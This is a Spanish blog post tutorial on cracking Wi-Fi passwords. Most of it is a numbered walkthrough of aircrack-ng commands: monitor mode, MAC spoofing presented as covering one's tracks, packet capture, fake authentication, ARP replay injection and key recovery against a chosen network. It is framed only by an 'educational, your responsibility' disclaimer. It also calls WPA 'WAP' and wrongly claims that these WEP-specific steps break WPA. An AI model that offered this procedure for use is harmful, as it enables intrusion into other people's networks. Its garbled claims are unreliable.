Romper contraseñas WEP y WAP

Publicado por Jose ant.

Material:

  • Sistema operativo Backtrack 3
  • Tarjeta inalambrica
Introduccion:


Primero que nada, este tutorial pretender ser educativo lo que el usuario haga aprendiendo de aqui, es su responsabilidad.

¿Para que queremos crackear una contraseña? Eso no importa, esto es meramente educativo y un reto para algunos.

Tambien es para demostrar lo fragil que es la seguridad de nuestros provedores de Internet y antes que nada hay que saber que tan "seguro" es la encriptacion WEP.

Segun Wikipedia:

Es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits o de 128 bits.

Y como dato curioso tambien nos dise wikipedia, que este sistema de seguridad se "dejo de utilizar " en el 2003 y fue reemplazado por WAP.

Pero hoy en dia se sigue utilizando la encriptacion por WEP, siendo la mas utilizada todavia.


Empezemos

Ya que sabemos que es WEP, falta conocer que es Backtrack.

Es un sistema operativo con kernel de Linux que es utilizado exclusivamente para hacer test de seguridad no es necesario instalarlo ya que es un LiveCD.

Lo pueden conseguir aqui: Remote-Exploit (va en la version 4)

Con estas instrucciones podemos crackear las WEP y WAP

Instrucciones:

  1. Abrimos la consola, aparece en la barra principal como una pantallita negra que me recuerda a la consola de comandos de Windows.
  2. Lo primero que debemos saber es que tipo de interface es nuestra tarjeta inalambrica por lo que pondremos el comandoairmon-ng
  3. Ahora aparecera al final algo como eth1 o wlan0 o algo parecido esa es la interface.
  4. Incluimos el codigo arimon-ng stop (interface)
  5. Pondremos ifconfig (interface) down
  6. Como todo buen hacker informatico, debemos cuidar la seguridad y cambiaremos la mac usandomacchanger --mac00:11:22:33:44:55 (interface)
  7. Aparecera un lindo mensaje que te hara sentir hacker bien, y ahora activamos nuestra tarjeta usando el comando airmon-ng start (interface)
  8. Ahora revisaremos todas las redes "disponibles" airodump-ng (interface)
  9. Ya que se muestren todas pulsamos "Ctrl+c" para detenerlo.
  10. Cuando sepamos cual queremos usamos el siguiente comando, llenando adecuadamente cada campo que se pide esto es muy sencillo airodump-ng -c (channel) -w ("nombre de archivo") --BSSID (BSSID) (interface)
  11. Ahora abrimos una nueva consola, dejamos trabajando la anterior  y ponemos esto aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 (interface)
  12. Tenemos que esperar a que nos salga que ha salido correcto al final aparecera esto :-) (algo similar LOL)
  13. Cuando salga la carita pondremos aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
  14. Abrimos una nueva consola y para finalizar ponemos aircrack-ng -b (BSSID) ("nombre del archivo"-01.cap)
  15. Y hemos finalizado solo es cuestion de que el programa cracke la contraseña.

Fuente: internet-end
Etiquetas: El Dia 23.1.10

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)